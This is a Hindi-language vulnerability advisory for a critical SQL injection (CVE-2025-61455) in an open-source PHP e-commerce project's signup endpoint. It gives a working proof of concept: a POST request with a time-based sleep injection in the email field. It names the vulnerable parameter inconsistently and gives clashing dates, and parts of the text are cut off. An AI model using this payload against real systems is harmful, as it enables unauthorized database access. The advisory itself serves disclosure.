
CVE-2025-61455 के लिए सार्वजनिक प्रकटीकरण और प्रूफ-ऑफ-कॉन्सेप्ट, जो E-commerce Project v1.0 में एक गंभीर SQL इंजेक्शन है, जिसमें तकनीकी विवरण, PoC, और शमन अनुशंसाएँ शामिल हैं।
प्रकटीकरण तिथि: 14 अक्टूबर 2025
CVE ID: CVE-2025-61455
गंभीरता: CRITICAL (CVSS 9.8)
E-commerce Project v1.0 में एक गंभीर SQL इंजेक्शन भेद्यता मौजूद है, विशेष रूप से signup.inc.php एंडपॉइंट के भीतर। एप्लिकेशन सीधे SQL क्वेरी में अस्वच्छित उपयोगकर्ता इनपुट शामिल करता है, जिससे बिना प्रमाणीकरण के हमलावर प्रमाणीकरण को बायपास कर सकते हैं और मनमाने SQL कमांड निष्पादित कर सकते हैं।
इस समस्या को पहचानकर्ता CVE-2025-61455 सौंपा गया है। सार्वजनिक प्रकटीकरण के समय, कोई आधिकारिक पैच उपलब्ध नहीं था।
signup.inc.phphttps://localhost/e-commerce-main/includes/signup.inc.phpएप्लिकेशन बिना किसी इनपुट सत्यापन या तैयार स्टेटमेंट के SQL क्वेरी में सीधे अस्वच्छित इनपुट का उपयोग करता है। यह भेद्यता signup.inc.php फ़ाइल के aid पैरामीटर में मौजूद है।
एक हमलावर ईमेल पैरामीटर के माध्यम से दुर्भावनापूर्ण SQL कोड इंजेक्ट कर सकता है, जिससे समय-आधारित ब्लाइंड SQL इंजेक्शन हमले संभव हो सकते हैं।
उदाहरण संवेदनशील कोड पैटर्न:
$query = "SELECT * FROM table WHERE email='$email'";
यह इंजेक्शन पेलोड की अनुमति देता है जो क्वेरी तर्क में हेरफेर कर सकता है और संवेदनशील डेटा निकाल सकता है।
| CWE ID | शीर्षक |
|---|---|
| CWE-89 | SQL कमांड में उपयोग किए गए विशेष तत्वों का अनुचित न्यूट्रलाइज़ेशन |
| स्कोर | गंभीरता | वेक्टर स्ट्रिंग |
|---|---|---|
| 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
सफल शोषण के परिणामस्वरूप निम्नलिखित हो सकते हैं:
git clone https://github.com/Bhabishya-123/E-commerce.git
प्रोजेक्ट को तैनात करने के लिए XAMPP/LAMP का उपयोग करें और नेविगेट करें:
http://localhost/e-commerce-main/includes/signup.inc.php
निम्नलिखित दुर्भावनापूर्ण HTTP अनुरोध भेजें:
POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=
स्पष्टीकरण:
ईमेल पैरामीटर में एक समय-आधारित SQL इंजेक्शन पेलोड शामिल है: '+(select*from(select(sleep(20)))a)+'
यदि एप्लिकेशन प्रतिक्रिया देने से पहले 20 सेकंड की देरी करता है, तो SQL इंजेक्शन सफल है।
mysqli_prepare() या PDO) से बदलें।| घटना | तिथि |
|---|---|
| भेद्यता की खोज | 16 सितंबर 2025 |
| सार्वजनिक प्रकटीकरण | 13 अक्टूबर 2025 |
| पैच उपलब्ध | ❌ प्रकटीकरण के अनुसार उपलब्ध नहीं |
यह भेद्यता निम्नलिखित व्यक्ति द्वारा खोजी और जिम्मेदारी से प्रकट की गई:
Tansique Dasari
🔗 GitHub
✉️ [email protected]
💬 यह सलाह विक्रेता की प्रतिक्रिया की कमी के कारण स्वतंत्र रूप से प्रकाशित की गई है।